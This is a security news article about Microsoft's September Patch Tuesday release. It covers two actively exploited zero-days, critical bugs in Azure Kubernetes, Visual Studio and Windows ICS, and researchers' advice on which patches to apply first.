Microsoft Patches a Pair of Actively Exploited Zero-Days
Microsoft addressed five critical security vulnerabilities in its September Patch Tuesday update, along with two "important"-rated zero-days under active attack in the wild.
In total, Microsoft released 59 new patches addressing bugs across the product gamut: They affect Microsoft Windows, Exchange Server, Office, .NET and Visual Studio, Azure, Microsoft Dynamics, and Windows Defender.
The update also incorporates a handful of third-party issues, including an actively exploited, critical Chromium zero-day bug that affects Microsoft Edge. With the external issues, the number of CVEs total 65.
Despite the breadth of the fixes, researchers noted that patching prioritization is fairly straightforward this month, with the zero-days, critical bugs, and issues in Microsoft Exchange Server and the Windows implementation of the TCP/IP protocol needing to head to the front of the line for most organizations.
While two of the CVEs are listed as being used by threat actors in the wild prior to patching, only one is listed as publicly known. Both should be on the top of the list for patching, for obvious reasons.
The public bug is found in Microsoft Word ( CVE-2023-36761 , CVSS 6.2); it's classified as an "information disclosure" issue, but Dustin Childs, researcher with Trend Micro's Zero Day Initiative (ZDI), noted that this belies its gravity.
"An attacker could use this vulnerability to allow the disclosure of NTLM hashes, which would then presumably be used in an NTLM-relay style attack ," he explained in a Tuesday posting on Microsoft's September patch release . "Regardless of the classification, the preview pane is a vector here as well, which means no user interaction is required. Definitely put this one on the top of your test-and-deploy list."
The other zero-day exists in the Windows operating system ( CVE-2023-36802 , CVSS 7.8), specifically in Microsoft Stream's streaming service proxy (formerly known as Office 365 Video). For successful exploitation, an attacker would need to run a specially crafted program that would allow privilege escalation to either administrator or system privileges, according to the advisory.
"It is the eighth elevation of privilege zero-day vulnerability exploited in the wild in 2023," Satnam Narang, senior staff research engineer at Tenable, tells Dark Reading. "Because attackers have a myriad of ways of breaching organizations , simply getting access to a system may not always be enough, which is where elevation of privilege flaws become that much more valuable, especially zero-days."
When it comes to the critical bugs, one of the more concerning is CVE-2023-29332 , found in Microsoft's Azure Kubernetes service. It could allow a remote, unauthenticated attacker to gain Kubernetes Cluster administration privileges.
"This one stands out as it can be reached from the Internet, requires no user interaction, and is listed as low complexity," Childs warned in his post. "Based on the remote, unauthenticated aspect of this bug, this could prove quite tempting for attackers."
Three of the critical-rated patches are RCE problems that affect Visual Studio ( CVE-2023-36792 , CVE-2023-36793 , and CVE-2023-36796 , all with a CVSS score of 7.8). All of them could lead to arbitrary code execution when opening a malicious package file with an affected version of the software.
"Given Visual Studio's widespread usage among developers , the impact of such vulnerabilities could have a domino effect, spreading harm well beyond the initially compromised system," Tom Bowyer, Automox manager for product security, said in a post . "In the worst-case scenario, this could mean the theft or corruption of proprietary source code, the introduction of backdoors, or malicious tampering that could turn your application into a launchpad for attacks on others."
The final critical issue is CVE-2023-38148 (CVSS 8.8, the most severe that Microsoft patched this month), which allows unauthenticated remote code execution via the Internet Connection Sharing (ICS) function in Windows. Its risk is mitigated by the fact that an attacker would need to be network-adjacent; further, most organizations no longer use ICS. However, those still using it should patch immediately.
"If attackers successfully exploit this vulnerability, there could be a total loss of confidentiality, integrity, and availability," says Natalie Silva, lead cybersecurity engineer for Immersive Labs. "An unauthorized attacker could exploit this vulnerability by sending a specially crafted network packet to the service. This could lead to the execution of arbitrary code, potentially resulting in unauthorized access, data manipulation, or disruption of services."
Also included in the September update are a set of Microsoft Exchange Server bugs that are deemed "more likely to be exploited."
"While none of these attacks result in RCE on the server itself, it could allow a network-adjacent attacker with valid credentials to alter user data or elicit a Net-NTLMv2 hash for a targeted user account, which in turn could be cracked to recover a user password or relayed internally in the network to attack another service," says Robert Reeves, principal cybersecurity engineer at Immersive.
He adds, "If privileged users — those with Domain Admin or similar permissions within the network — have a mailbox created on Exchange, contrary to Microsoft's security advice, such a relay attack could have significant consequences."
And finally, researchers at Automox flagged a denial-of-service (DoS) vulnerability in Windows TCP/IP ( CVE-2023-38149 , CVSS 7.5) as one to prioritize.
The bug affects any networked system, and "allows an attacker via a network vector to disrupt the service without any user authentication or high complexity," said Automox CISO Jason Kikta, in a breakdown of Patch Tuesday . "This vulnerability represents a significant threat ... to the digital landscape. These weaknesses can be exploited to overload servers, disrupting the normal functioning of networks and services, and causing them to become unavailable to users."
All of that said, systems with IPv6 disabled are not affected.